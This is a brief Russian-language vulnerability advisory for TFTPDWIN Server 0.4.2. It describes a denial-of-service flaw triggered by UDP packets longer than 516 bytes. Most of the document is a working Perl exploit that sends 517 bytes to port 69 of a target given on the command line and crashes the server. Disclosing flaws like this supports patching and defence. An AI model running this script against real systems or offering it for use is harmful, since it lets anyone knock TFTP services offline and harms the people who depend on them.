Программа: TFTPDWIN Server 0.4.2
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке UDP пакетов. Атакующий может передать специально сформированные UDP пакеты длинной более 516 байт, что приведет к отказу сервера в обслуживании.
Эксплоит:
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "69",
Proto => "UDP"))
{
print $socket "A" x 517;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:69\n";
}
